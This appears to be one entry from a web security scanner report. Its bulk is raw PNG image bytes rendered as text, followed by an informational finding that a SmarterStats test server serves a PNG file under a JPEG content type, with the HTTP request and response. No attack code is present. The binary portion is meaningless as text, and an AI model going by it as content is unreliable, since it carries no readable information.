..Z#...i.A..G\.G...qy.4<..-..kt.. .0.@ ..p...1qhL.X.$.P...'.5.6.4....6...z....(#.........O..p......L.)..Z...p.n.eW..q......u... ...l..C......tj.uF..z....d..j v-......uU........./    ..?..6..!z`p................-..S0}1....:.*.y....3........    @..{..z..HH..k.a.b.=4...pL.L......[Zqy......@@.. ..;vh..    $..M..(.k.#.e;..]..9....Z......... .O..l..7.......P.."{pu.".f...?...a.n.9E.o.......e.5......>    @..s..j....?....J.w...Y.P(,..p..+.....Tg.
.....].1..6....nL.=...V..+.k+.....
..(.!.\..
.....@..O..M.c......CW...TEb.....l..b/.,..4...:    O...+..,..M\w.@o..
..'....1D..B..uk..A...!..$VyG...QU*.8a..Wp........>.    .48.W.....".Z....{T...D.q.J......S..].>......>.    .48.W.....8D.3&......Y....!..;..v.. ....l..'.......S...E^.^|.d.v....R....4Z.....0t...A..M...V.........N.W8_..9...d.{.......u...H.sh..Q...w?..-C.A@.. ..1Nh.A    .I..&.'.....}T*.......".)^..bA6u...F.5.n.....N.
.4.........).k.b...*00.........^...q..f...EC.A@'. .t2Ph....bp^..,...oq(.i.n.....JwB..;..9....@@{. ..7&h....D....b.Aj......s...)-..|.i..<.o ....    @.ipP.$c.p%.........Gs.m..u....0<..q...h..........R.h.9...../.....9.4k.yT...>.7..@@c. .46 h..    ..h.f^.$.``.d.pA]..;[.    /.....{...`....e.$....5....G.....j......&V".P..._>...    @.i~..@....kU.o$.d..G..$.-i>....\..-.....n+.m.&..#9...... .y..l.."4.(..z.....2Ca`...P.m...5.7......lz.).3.    .|.+.?(..wmu...q.Z.H...[s....2.......:.3..l:.0470    ..\....:Uq.T.....'s@...UL....70_:.
.tF..Mg........U......    w.Ud...y.........N.......}.......~..-....y.D..'.....9.v.iE....y}%.......`./<.....-........s.S+!.``........|p.2..dO0.......`..{<...-.x+ g?.\.....00Pu.._..t.......    ... .?..l.c.'.....EA3...h..:!._....s...1...Hg............`......&....N.BV........s....N........l~...Vt...K......t....?..t......_...7......Y'h....~c.u../..6....L`..tj.y..`..*........xm.(I>.."..#...@.?. ....O58....2t...;..1d..R..../..../8...'....t....o/....!.....x..    .;W@...;....RN8...W..|'.^!..lQ. ..28@..|O......D......yT.C..IB!..?.m.N....s@..........x.A...@......H..B.....D8T.l00.....4.....l.Fn..GO.............q ..X.g.r....|1..-<.H.5..F../.E....1..6....@ ..U..q.i848.,....s.s.-..Et.....!.....x..    (Y....|.C.gA...PRD.{.....].+..6.....H@.........``..9.~q.S...{..[.}....6-...`..J..uXr...d....s@.......>.......`..k<    ...9g.....].y...e.(Y..%i8....@.w. .|..O..E...........s.w.p..-......|O......D..xo.j.M.9....".`.Z"...c.(I<..[i.:..o?..mF.A... .|..O30..J.i..f.mT.......U....D.&..D\...$..    .........<l.y....H.=....:......oy.i.&...=tm..D....hL;Z....;.....D\....N.v.;.05.s../..x......du...h..i.......JC.}L......8..(::..DW..lr...uG.:....M.....O..........WR.1..NX
5.+..Zx.:.^...W.....&..h..t....9.........q.%....=...P.......>....5..3:P..^....o...%}<"....P..'...s..A....9.d#x......./4z..>&...c.x.q    .....%.p(.^nmL....n.lB....D\......E....j..W7..5..N....'......9......h........}..s..1..6.....K...._..9.l/.`{.....$.1..
...>...B.NYrC.ak....T.Qj.uF............xP..jz..W....9.......a.Q.%...c:=....5^........lj...6.......J...1'7...U$7..D\....)....H.`.6r3.<zj...=.....`.!l<....?......T..}s#z..7vrQkZ;-..qr..q..]NUDrC.Q....q....vK.Q'Q..f<.(.a..+.\.. ..9.hU..xz;.rg.I.`c../......lO..{S.a3...w..uq#Er..q.ErC.........>I(t..{.......i..l...4.P...l..y.KzpH..-.5g.......4E...F.I....a....Lj.}.x.:,p.(.l...(.P....@..a..F..x..D..+:......8.@/.. ..&w...C)...........vR.i..bA..............;t.[sB..':..z ....QB.uO....tw..N........iC.S...qC..X..E..u<.....F.
.w.:.]...7a.g.d......W.:.#..l:.,4U..
v.....u(.~...W....]Z...ft.)..%...\.......k:.,..."..-...(..A...;    -....6...Z.C.Jv9.../b..#....i....!D\.......e.ITO...d.)j.8........I..br....:|#.d.....6...Z.C.J...%jT.vC3J.....>........1R..I{..Hn`....#.....o.49.    @.....o.!.T.qX.f. ua;.......MA.K....I.z.w...c.r.(3..6q......    w....~....AC.@.............e=8,
s....6.zz...:...Pe`<...E..;
S...4.....v..Q.o.._0....@..........R.F......;.
.Z..9!4....4..M_.@1..`^f...M..`h..........].?.e.....b.>......).B.B+....H.)....S.O....@..<$...!@\..J.(.l....n.s....Att.?Pxfm.8..-...eo.L.7W.'.R............`....a.D@.`KnE.s.AK............:M.H..4....gyM.....jf_.....4.........`3.`...#.d.....7B..\g...-3.M.kl=.U.5...]..........Tp..en.B-9....'....... .....@......'..i.s........g.....$....E~^.....
..-<T.^.....4.S;*...p...l.2.?~<.........~p:&8...L.................ma.0..V
...P.f\na..;k..A..O?..m.......;.f...1..]..?.......Z.h.%&&Rff&....,X@...>{.. ..#..6=....;.%9[)o^..{.Ju....\``
....bMf....>...u!..v...C.........b.en.@../s8....OQQQt..A.6/.6.6.}...~ .....x...<..A.3..\..mGo`........P....4.r+...jN!..)...$.*D[\...(...l........R...7..?....EEE.h..y3.8q....%.I.6.}'.....`s......    <.w.r...s......aN........m...k&..qZ.:.Y.Y.....UM..k.:........o......./..B.6m....JKK..'O..0`..L...1.k.\.V..F#..f..G.B....tz.?9.l......0'..,.B.g.;.....u...m.....w7..F......Z.......t~_.....a....|.....;w...........<4..@.....;.%pr.?./....6.....N0..~..D
.....f_    .k}VU.E.....=.v.[7)4z?...l!6...zR.]G.?~..gZ.r%-_......is.i..M..Ih...@..k..Z.....>=_W..`....:..1.B.C.Q..........k...U).gO.;.....}y....c~;Q..".g.:,.{..y.7o........hS".....`. ...    @.av.....%.P..*N.[K.].....a..B...\i....4...+.!..m[.."4ZUx.>qh....v.....a\.#!!AZ...m.k...C..?N.'N..[....~    @..w..r....w..-..X..n....l0x....
...Ls.vpj.gZQ..w.F......qq.Eh.x+zq.S....6..GE.}1....D....SJJ
.:u
V...`.r)s..........    @...9.hP....6...O..v....&.
]...E].....L....S.._..."4....zy..S.Yx......vk:,.Q\\,..HJJ.`......N3Dw..!..... .....f.........=...g..uZt.3....%.P......:.d...O.z..._}e..6.G..5.`........<.O.;k...........X.........~.zb....@..s..4A.../....A..h.X.q..C.`e....    ....4?..Kb....K?....S..l..Z.^Rh....",.M.=..    ]<X..S...........-[ .....z.jJMM..;.F...    .....A...@....Yb...)..`RX.T....=.h......M5i.W5.f..v.d.Ne............o.HO........v..]*y...9c(S.a[.l.egg......... ..&.......;.....:    ..M.Sz.....vgI%J..g....-.{.1}=.C....C.*.F.#k........>....t5.......]..m.w.6.`..Yg!Q^..[....@H.s..4C@.&.R........6.B../.....n.....=.=....C..B...-....`3    ...M(sG...v..Giq=..`....m......4$..................q.x.....^.5...P..=(&....}.+q..........KC.E.....BD..w.Vv..    ...!...r.....X;{..S..Jz....-.?..6...Z`0....Jn)......d
....A......#}...A....&...-...n....R..G.v.<y"..].n...    Dc...p..m.$.#...... ..3.. .*.E;..jJoR>.7B...~..B
......b..^...u_..[B.9.."4..V%z.%v@(..m+..A..}..]_.p.p....{......)...../.>... .....sF8..T%.R......d...F'&./Zt.)-..S.......S.n.....?    ..!U...>........kS........{.m.m...
.S.!...C....._....*...@.Y.K..~...........mKt....."Q w.;..F/.l..F4zD5.=t.b.$
..../.[_.......G.z|w..9..v.......0b .7g.P....k.k
. ..6.
....r....k.;.m."$z..!..M.........X...M;..>...b......*]Q....~&...<.........{...b..m.3g.......?.[.d
g...\.5kV....!..D..M%....B..H$.Y....X.&..|s._....?.B.K....7.P..]..:N.@..s..?.D
...._5.s..Tl..%..N.....?V.X!....pS.p.q.F..y.+....C..`3.....".SI>eM..s.[r+.c.......B...]...W,d.;tv.WT0b.K.Id..\..^=...=/.B..x...B...e.6o.<:|......LI.\..^.v._. ....#....!C...@..?.O..8.mo...7i....oi).Bc/..b..W.GTe.= .%......,..hIVw..m.....X....a...~.A*..v.Z).T/.6g.P._..o1.... .|I.......a......A.i...%.BcSZQ\~_....Z../.
F.r..w.T.F?.b.k....=D..w...H..FZZ.-X....;.yO...k{....(...... ..... .*.W....    ....F....Z!...0.h.....G..Q..i....`.h.,.A-...L..........cAR...?...c...R..^.u.......k\,...#..O....:...@.a.O....6..WUu*....Fo.....Md......7.x.....>.+S..1n..!C(......_...C.bO.t.....'...\....FGG......6%.......a...... .....2N8...B@.f.b.*I......../)c....i.h...^........T8v..vL.F7u...k..f....K).).p;..?
..)22.v...)O..phjj*.`....p..1..o...W.ap.@"...H......o._....L.l.r.e....e...    .ys.{.fI%......7...3......%5.M....W..{...t..-.....v.4...b.qqq.e4..&U..ARR.%''.....Z.o.{.R....6v..+X...v.......j}.y..j....    ..6.`.C@.<.....S+.|d%z.[..`.%>....w{....
..5...}n%:8......m.E.h\....^..^......=....~..\.tI..q.4''.o..QI84**.x;.[....$.....%Z1..+.[.$.,E......L.....q{..&...9....N.....6.~...,.`.(.+..}.1R..[j_)..w,.V...S.........L.........~D/......i'..pTl......r..^....v..Y.........
....8.....&..........7...J....7}1.ucc)....['.L.7[....t..&'..+(...........#....1.Ztsq0....-^C+.......3-..#.y..Y(.t./.'..tq?K.z..~7..E..V....]o...J6......Y..;}.8..>X..a.\.......M.s.......f:.-oM......mOk...D'F..D.9..vIeJ.=..6rWc
.Z..N...I...V....>....#...O...8.....4w.\)....MI.\w.C.".X.X*.3..!.$.S.d......f.\.g.,...I..]'.a.!Q..3.;./....7<.*}.6.. .4:.XPY.3. B......7....j..../,../..s.._V.I.M2.'......L.......?...~O.:[...m.=e...m.`r...?...h.Mc..{.l....R..w..v5%:.[..1..g..K..5......u........=..".4.....P.e.f..,?..T...S..{........o.x..O...*    ...=..}....o....`..l....l.A...L^:......G9q%..$...h..........'..k.@....PU.%..+...m)hH.$I.....}d(%...y..8[.....l.C.h..O........|&.]&H..P...my.....%..m.....p.....tvz.i...Wsv(-.A..-s4...M/.[j)..2...k#.b1....S...aa..Q.5..WU....S{r..en..]_.pJ..6...^7o.7%.5o....7.<./.J<5..U:...9.l..JK...D.#..C.f.~.    ..~.B.Pn.....9.._.;z8.....w1".M..n-.D8.....|.z...e..r.>['..SNP.....$......}
..1....C.%oZ^...}.a.n...=tm....l)=.N.....K....U+....Q~..io...p.lm..tys{zU<.....h...DY.Z8,....Y.....rss.b.zU.]....ek....v.c..Ki....M&.-....M~.....5...H....p=..y....d....]9.&..*..9\.&.\..P.z5.H..)+.b.>../[.f/..d...Vm.tPl\......5.l,..=.g.0..Z.E...@Z.v*T..tcS.?.SR.h.[...)ml.'.1j.u......wF
...s+..&.TtX....rx...'.pV...%E.    6..6m.4w_..].Q.....Zs...Sz?.<l.a_.a..<S.`.6...q.).i...`.<B.......z}Y.n.    K.N,.O.......Z{fKLZ.....V.........x.c;5....'.@.8......r..v5%:.BoN.j.~=:......:.S..1~.>q...!....ljY....B..L..=/.EY{...........KEj..<...M.w->>^.u.<d.......&
~He>8+...M..<.S..L..M.,G.sA........W......`.....$..Yfh.y......D.I.X.%..6....O9.r..d.J...2K.\.V.ti.f.B$...l..n.4=.R..g..h;..D.]m...q(t.(...p.&l.. ..uC*...5m..k......6.ov7..Q......\l......../_...x...?N."...>. .....`s....,."..-..N.Pr..fG..zf...Y$:...r....6...@..%...R...1.3.O.....=m....IB.i..nlF.........M9.....JE...jyb.....+2F.M....p......g.:,..Y.......4...'28.....;.....^ `$..l..m..-........md...:nr...u.,.....v.DKK.8o...]4.`..e....mGzsj".9=Y3.[. )..p..!.B5c......".r..........czY..w.y.-........a..?.._/.i.r..Kv..i....k3g.$.....@.3..l.... .....p6..(...h.....    ..    .xm..)aeM.P8AS.....8...    ..[].:]..U..p..w..)s.{t.b..9.^...h...JE...k..y...75(..6..<..}...-...3.. Sb.#...J.~6S(t..I.E.....L.G.E.W.......[..~w..~..W{.(.~..@.S.Bg.6pX....X*..e...z..CcQ.d.wx...............5...y...........!...~........&e..bm.&..%.h...T$..7,.k..=..X...W{q.;.(h&....t|...A~..7.....nLL...7{.M........p....C..M.....x..K    .....Pw!....DH......5.h..0....)jh3*.%..e..~,B...`...{y.Y..D...Ft.`%.9..a....B....L`-.....D....k........... ..:...~...7......E9tz|(Q.t.......)......i.t....S...M..e.'N,......g..xo...-.    6.p+:....UpXl..p.]....A.].&..D..t.........`. ..6.........e.z.~.PG.hKn)B......>..i_K..u......i[p.K.br%./.Zx..w.*B....m..-.^.    .+.L.... :..].;=.a....eo..........k))).5......-.6..6m..Z....g..Q...T&..............3S.P..5h.......P
.Z..GEy.V.....=...Y>....:.k&.....g*....-...\lw..U....B....wU... ....6uy.n .5...F.h.sb.....j.........:M.Hy.......jWBC).ae.{...-..U{Y..%.v.dui;+.GFF...ad^.fO.m..U*....@@}..l.3..A.k.....oWWW.i.......!..a.....
..3\7b.....?.}....!..m.?.....'<l.^.....$...R.2.Wv...5..<y"....Pk.....{...z....N.........._~~J.3+..M....7..hc..=G]..;..&....f....k@.F.....z....f..L.S...m.........g......]....\.#J..y#y.p..............6.p.]A.k.x=[........)...b.UQ...<..qb.................u..Xo...:i...V..Q.1Z2O5{.p.Kb.......=.....YTT$.6.&..{7-]...{.. ...    @.av...    <H......{... B.I^6!.<..G.R...I[....Xc..u.K.;.
=..=_.!.5.wD}zU....|..;J..*.[....P....e.6u.T..Iq...x........ .U..6~A.,..5..{.^...e...../%.oN..........S........D..44.O......o.9..fK..n.Y....nM.$..m8@...K....|qw..*.+K...kj.(.. ...m{..H
.&...kk?....,.obc}f...KC..#...h...0._.5.S;.8.O....7..........q.....NB.._......h.a...%{.:H
.n..G{.D..z..LG...b....v.G7)4...B........&/...3...O?..o... .....`..!n...%...{.;..K.......N...B.)2.........[....uo......]..e.|j.E.ve..t..0z.$F..D..{.\.k..zfW%z..e.NR<..@.c..l.#.@...L....-.5O[r+...D..9....P.....a..m)|tC*^...v%,...*..o.;.'..........&.|.;.k.=...P....*.q...?...3(7..rY.    o...B.....:*.
......i....as......Q.....v....|..lK.........{.X....!=.....-...P....*.q........-....79.....K.Y.....%..L.....%..R....".X >.k.V..&B.#EX4....w9...nM.Zk...h......`.<...#..h.[Y.X.F.E..2+N.G;g...x.(.lOQ4q....x........wK.oc...>.{.La....Hw.....Fw@.. .0.@ .    x$.v. :=I..e.*m(...B......,    8.,....3...Z.7;.....6._.....g..h'...'.d%@............8..%.0...6..=z...L...}G...L.._
......>.H...6......^.7{(..Rh4...(l..X.....A./>!.j.
.h.....3...6.9:l$.,.x..g.5\.....xy..2..h..0Jy.4 m....9..=JH.......t...uK.}.[G*....M...f.7.}5...6#.2.hh.Rq..5.$..b..jK.::..(.Tm
.....w.Jy..&..lzJ7.3..=^....k.
G..k..K..~-:.!....7.....Lr-.;.@....G.....[.(............Hw.WQ$....+.^..$.L.....n..C"<.(.muN(.....b...)t.sg.Xc.v.];...>.O..H......SZ9]...........l.1....("P.2.....j.P.....kr..y5X
...f..m....qj.z......g~.^.B..a.?3.6.UM.s(........jf_...C.)z=p..h...........    .do.........R...~..].f.os.v..w.).8^..2.]Q.d>=^..k.._..2..P..6G.Q^.....=.Otyb@.........@.ij8......4g.GT.[."Dzv....-.8.kr....-w..Q!..h}bk............(.5`.".f.m.B..2...]..%..2c|&.J.P..    t..q...\'2h..`.,q.w8......[`./z...    ..=.rg..8....J.a..].kr.6.Jk.P8...W..F.oF.CC.d....h.L.. .).....<4.....~..N.U..u4.>.m.l.....    @....7..}..=H.F...Q.
..4[g.....Q.m1.{.F.6..g4i|.z.i.GV..H...).kW.<j....F.Nz..o.3=y......hS"....    .#....A..........I...."...k.........7.[:G...2A..U.....\'...:3\...G....4{m....E.N.q..f-.._.L..L....*.......?....]7...?g....J.;uRE....i..67h@.:./...$..hS*.."..S...N......VljQiw...Y|...wa.]j..~..Y..!....6.8.....S....<'...9C..........i.}..6M....p.. q.}h..i..(QS..p).L.HO.lQd%.7...s.`.0UE.....Q#ZU.........k.M.`..s...T..H.    -.`.s..}3    >K.W..+....gfj.W..(S.7i..u......0.. ..`.D.... .....9s    u..J...PM...o\.7.`4.}0.2.'..:M.H.kW.....4^..@$.xK..X;..    ..Q.2f..D.=...d....?.@...x;,.PE.....S."......q#db..w.7!.L.N.. .|6.. ..@...W.@.....o)|SO....a.i......h}.x.s..v....ZP.R......K....T4}:...N.={.....^-.uk.(..[.u.....d^.....*...2$j......Y...T.i.B.e...~....@F...7..6}..Z..^'.a.....~I5)....l....|>.J.Z.......m......(.......,D..k....M.f.>^.gr....-.
.U....Tu.
.>).<..(`>.E..z4.!....,...s*.l.a..P.v....C...=.........6..6o...A @.....z..I}......{.....u%.%..N."....\.u..N.......>..D.qB.N!....I....../.d....$..Y.2....e...gr.....p..DK[...    4...{..%.....i.....G...........,kL}W.W..).y...q..*...hA..6....S...>]...)......A...h...@....T.p.y.._.mj.6.e.5.....c..S...\...]...S..@..."....6\.. `"..m....m.G4`ku..sSK....~..t.C.*.......4......t..9L..........G.p1....@....>}......5i...U....@...g..QrH#...I.q....?......F..41a@..@.-..lna.E ....\.w....F.DV..KG...y..;.
.w...`...C.#...d.vp..s.g..    ...5...P....j(q#...k.\...KC.}J.g.K....~[>....[..w.G4....
.s-[J"...q..a!..ff..|...}.bR.....*. .T......(!....m<....l%    8.4...._...B.C.L_..l!.8..;.$..+    .EU..j.6.E..uiq......48..@.....`..........q......t...,...ZR].q...0....;[.....O~...a..78a.......%K$....Q.....i._... ...E..-.........d.>...v.y.'.8..q..wX`!..TNd...4...I\N..z.....>...t=.C.g..j.3..7zB=:6m...L.m../    .....nL.`......`....E `(...-f.x.}.P*'2...$.96Nj.r"l.....d.r5}f...z..|...yw..xQ..o...jL.Y....    @....w...p...5.m.zp8......xB....z...@.c.....h...Z]..U.v.........6...c@.......g......&.C.z.....D.A...G...{lqg...'.x..........+......Ot..@.{. ....w...pB`.............&......p......p........h'..0...gOE.v]fq?."..G.me.N(..tm..*8..)....^..{.........v.:..!..6.......@...... .....\@....~..?J....l6....c.../..D...I...:    ...>\... ..vh.1..6...61.....b.x.........w...).X.....'...c.e....[IR..S..$Wb6...t(...atHvO...\.em        .U......Z#=....e^B....(.n .u..l^G......"`*`k$:......Tu.l...f...
..X.D.Ih....w..5    )+/.....M..{.R..Y ....^..Y.].:u.........&...m..?...M..]c/........Q.....5l.....&.eZ.=Ka....a..sr.V>d..J......Dmz...a.K..oJG........F...I...N.........g.....:.i.$q.E.,..(f..Y.....aTcR"=.....J....3+.@s.Z}(....#[.r...9.|V...=..St"._.ulF:8..Hl(?.bE......fHT&...+..K..-.nI    .f...#$]/..Zz..
6.Ai-...*.    6.NO..BWq*.........y^!..@'Kq&    ).o,.LOd1".oWZb.fV.......n..`c.e%..{.D.U...b65Vd..f.3~.....s.........8T `'q.B.)....R..,......Y{..x......M. .    .............6.....J....(.s.R...5....'I.....A3y..y...[...oeB.J...1..T...x..Y|....Km    M.h.....$....E..|V.96..J...............[...Ik.l.7..D.o..$.P...6..T....z...|I......,/....I...>E.T.J4..Z.....O.7...f..*wO.B.B8..YM"..7.....Ey..y.db..gV....6...w9....%u.lf...K.Y.aL..KC.....Q........:pr.\.u..L...Y.....>.f.:............`.. .    ..0.c.{...(...'.......b.RpY^W.M+.1sto....>.S.z.MOYY...g..d.@..PN.......eN..}Dq..@I.(....G....z..5Z    ..".....@k<!`
y..4    0Ix.!b. .
6.....8..Z.X..yB.)tiC....~..I@9Hf(..Z.Cw=l...9K..d.p.N...U.;.p!.t2.h.N.@..d..L%..(...2..Ld.([.f.E..7..`.ZSx.\...u.u`.......]_n....&O<0....r.`[............P.....Dq??.(SZ..`.g!l....<k..`..H.'...m...6....,.a..Vm..w+K..6?.]<..@.....`..    (.6..K.(...D.IaQ!...w.H((.uj)(.....Vk.f..<..vH..:l........4.............    M.........06..6c.?z...%PDk....5E....Jo.....5..V(e8....%.k..... ...l.. ...$`.fV....#.......!|.. .a..l...4..M .B.
&K'..[.W.J...    ...zK2.g.|._W..[e..<....{.....`....i `t...4Id...A..;=.w..G.A..4K..M.C......EX.t].I.......f......6;..9....h....F......`.,....,.8.....cqg
{:...;..A..@@.. .4:0h...@).....4..f.v....sSr>......F    @.it`.,...2..g-.BM.6..6W...=..A..@@.. .4:0h....Y.Ik...kr(.....m....un.s8....... ...%.....A.@..@..@..@.D..s..@..@..@..4N..M.............................h....................6.............8..6...... .. .. ...l.. .. .. .. .q..l.. 4..@..@..@................IEND.B`.

10.49. http://vulnerable.smarterstats.6.0.host:9999/Temp/c77c8b574b60474b8ac78495f6f074dc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/c77c8b574b60474b8ac78495f6f074dc.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/c77c8b574b60474b8ac78495f6f074dc.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:12 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB92FEF80"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..!.IDATx^.].......bcc...1`.ec..\.[.s.f...........c..7....a!.+$..]qH..V+.....0...?.....W35.3.=..S]....Q......*...#........A.`..V...... .(!"1.A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@...............F....Zf.....M.6.l}8.^......A...JAD.0........jp....;. -_S~....^...TA@. .JAD.-.%.    U....$_ .h.e...w..A@.(.....".C>:..t.bH..p.DMGW...&...W../.ellL}...R.....6..._...\D...".A*.n...s.Hw..".A.(...(........!...(...!.n....f....m.,I>.qBD.(......!.,D..U.H.c.[.D.FD..E..iL..t......Q.+..{.N...BD}l.{.~.5k....i......."]6.i.$.n.....MZM!:u.:...Y...g.........BD.`(..S........y;u..1+..>C.....q.-&X...<.....YMBD..L.(D..Qg..RM.|.BD..$D..Qg!"6..IBD..L.(D..Qg.D...>S..pBj.C@.f}`."b......:D.}.....u......!"!"...-..S...O"z...."r.8...@.WG.N...>..._.B-.m7..HD$...P..
..C..'.-=.4.x.}X.#D$D.2...Bt..u.ID........2.!"!"...-..S...o"z...X.#D$D.2...Bt..u.ID.1."r.92X..Df.!:u.:."..|...1{...X. ..DD,C.[(D..Qg_D..|.....Od.......P..
..C....}:9..h..3X.#D$D.2...Bt..u.ED....D.v.<....    ...%o...:D.}...O=..h...Y.#D$D.2...Bt..u.ED..Y..h...Y.#D$D.2...Bt..u.ED...Tw.........{.(.....C....!.....j.UW..@""..X...P.N.....h..+.....6\y%.t....X...P.N......    ..P............U...!.....?.H.......q..DD.....e......3..\.vS.sp....`..#2.G.8",".8.U..:.4.u..
.j..}.$...c0.....rj    ..C..WDt.N;...:Jm..rN..q..6.p..O...=.-!".9.
..C....a........5C$3\......h7...V.c....$c.....>.\I.N...>..$...... ...;U.......^M..I.....60..[zU.....6^{-..T.......h.'......t.X._......u......u.^...uEB.)3.....)...f.....#2.u2~...BI)D..Qg.D45:.#...^.6_=..J..M..S..)...X..<...T..g3..Y...d..eCN.Bt..u.AD&.~..k.f...\. "...2..z3R.r7..!".N..Bt..u.ADHxED.....o..e....M.....</!.<...;D..Qg.D......]wU[..Nm..oXF.(...m`!!..!dW..S....".......h...Y6 D..&!".9.
..C............4u....X.!D$D.2...Bt..u.AD.....5.}....LG.H..e(y....!............4k......#]..1....S...."ZD.....k".~.-,...H""...-..S....".....y?C..o...Y.#D$D.2...Bt..u............NP3......Y.#D$D.2...Bt..u...L......D..id.........!..7....5t...m....Ho|...H""...-..S..s.D......}8...+...........!..7......q.6........&!D........!..7....ABBD..C.....jBt..u....y...wT3.i>.......2F..$!".9.
..C.9o"ZFI..v.E.\v..BD..C.....*Bt..u....y.w....    .l.....2k68P.j...C.9o"B..}{....6.(.$.~p...hp..5...!..7.=L+..R...K..e.o.2.YG$...P..
..C.9o"B.....$D..a$"r.f..Bt..u........=.0....u.&;4..DBD.c..!D..Q......_9.H!"..s...8(..    ..C.9O"2    .+.>Zm.."].....;.....rk...C.9O".....3{...C'":&h.}p"@.>|..s.....vwq....'Xwbh2..i..-.k.....f.].Y3...S^.D.bj....F.GKG.m..\"".9.
..C.9....5..Yg.i:...._..e.%!".    u.%.......>..hh...0.o.{.#..X6.D(D..Q.<..d.o...P...r.....QR...R7.P_NQ...w.....>.......@l ...../j..;.i......_..P.$"J ".J.....h...l    'I^""...&.bt...yFD+h...v....>........._...D...%.....%7...:D..$"$......F..Y.......4...z#"
...f....k.n............:D..$.'.=W.G..s...Z..}..:..d........s##Xw...^.._M...*...7.*Y...rCf.^.9.|/.5...h.!:u.:...........Q7..7)=s..%......N.....C.Q..?.U>.5k..E.i.h.)n..?.q.$!"78rj    ..C.9......~..".(28.......3,.....v    ..C.9/"2    ...~..|.y.....q..........s&..F9e....K.N...y..Ix}.... ..........^.8..k...C....9.n.!.6.&....NR.h.....].j..#".3....._....!.......u..Z..u'...M...a.x.....yu...!.......I...t.9....kY..1"2[vD.R....wJ.<K......5@.N...y..NxE.k......hnE>I.&D$D...!.6::..;.Q..>..l.....e..Xu./$D..    Ct..u.+".    ....6.k.)[...eD........un....dB "....).._...ZH.nc...%{.....5v.O..a.h.,.g..,.....%.?_}U.z......$.u.k$.>...j..gv..|#".]..@D..h.S^...........@NH.C.T.K.._k..m.....D..5.....q.|..h..g....9F...N.....>..r........>....6\Hx}...{|e...X.f.#.......t}7b....5A.Ho.....{......8........X......X.(...DDg4.+/...h..e..P..Nq.k.2. X7.k%....=.2s..,|%".....6....;..0XW.K.._+...?.....UG.%D...i":.........(...8G..._.`...$..M....2s......(-"b...4V...+o...z.B..y..Y.`.....MP..3.Uh...^.....}Oa.Q..8......X...#.G..'3._.j.7...Q.    ..... ..a...(z].8.?;...X#....BD9...h..SXe=.8........9../X7.^v..zM]..l..2V..,".!..9jIg.E...s..D...(..+L...9../X7.....%..q....w..Q.i. ..v..,.9.5".t/..f.:":.dvy..Cu.........'.s..^.n`..&t...^.|e......$....zOp....^...z.!.,{.....%..O<Q....E].......X/..O.....\ "c<.....VC]....SS...D"...)..d..u..u.s.C^.n`.<..~..X?.r.%..)IDT."....'..bCB.}.....m[.^."I......a.q..........5...S.e.V..a........|.]#.\.`..3{.r...dNDD..5FO...G..s.i...c.M.....m... ..+......`..3...8?.r....)u...F7.p.R......^.....{..F,+.=...:*.../X..RH..%......yfk...9DD|#....._<.$.h..gl.j...D.....8.?...v..:..4.O...#...M....!...mI.....o...}_............$?..D...4..|..8........`_...m.).u#...q%..4.c\.1"F.y. D.F3    ........u##X+...........Tl-...;.s............`......vK..../d5.DD}`.....=....g.L..e.N...F....g...."r`j...=6s.k&.....s8hxf.....M<....>2=>.M..R".DDY....z!m..m.|]......j ...Y:.5.G....#".D&...........BD...Y.`....K....#..\.BS"...h@"z.9{..=...dP!q.A..._u..yf.P.....n.%uDD+F.-.w.U-...>.......<.U....""ZIc.I>2=o..a..."".D....E.ao....;G..F..:....i.^K    .BD9Z."..tz...4..F.as.<#..;G...Su..6.......>.Y"..M.%......"..vp.k_..;.......Xc.-.s........%5..y..2F.S.M.h.oM'..........]E.....Iyf.|d......1..1..G..\..i..'........ffX.....sp0r%Su...T.<.~.....Xp...@D..^.iO,x.Q..
uqU.9\`....X#.c    ..    .q-&....Q..gYC3jH.....nZ..#cSg...X.f.R.Y?..|..,l%"J..r&"4.2Z..1#l25.Uu...?....52....`!"... ...C...QF...b.c..#C3g...X#e    .......l:.......DD>H..X~...a.FGY.$Te.....7W.kL..^_...~>"D....o...m........s8hr.*...YU.&-G.....>...DDi..G"zl..........x.BU....^GI.BD..*.*..Q.....y.. ..U.9r6..........}..R}c.Yg......D.q..)....p.u..+.=.D..}].|..:.-.Ue...Y......4u?B.fi..9@Dtv......1....#...'<B..BO.e..;..).$.Ue...Y............1.76.y&...GDt..p].....1....q,...A ..$.4....,...1.Fd]i]e.`Y.C.*c.-b..1.4....tT.....R7..........Q.....]2S..v......5.<...."....f.m....i1c..O.~:......T.j...1^.h'z..N.|...R0>.X...w.q.*.Y..P..X....hr%.76.q.....Q...h....u...l...."!.........,kw,TU....;..(.76.NDz6.5M.......`.}3Q..)5..m.3X..E(..3..F......:.c.aUWU......9~.1....B..}..@8..[.....r..]V.9Q .,.....,.p,TU.q..........U..
